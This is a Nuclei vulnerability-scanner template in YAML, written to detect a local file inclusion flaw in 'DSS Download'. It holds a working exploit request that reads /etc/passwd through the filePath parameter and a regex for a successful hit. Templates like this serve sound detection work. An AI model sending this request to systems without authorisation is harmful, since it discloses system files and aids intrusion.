nuclei-templates/vulnerabilities/other/dss-download-fileread.yaml

32 lines
692 B
YAML

id: dss-download-fileread
info:
name: DSS Download - Local File Inclusion
author: ritikchaddha
severity: high
description: DSS Download is vulnerable to local file inclusion.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: lfi,dss,lfr
requests:
- method: GET
path:
- "{{BaseURL}}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22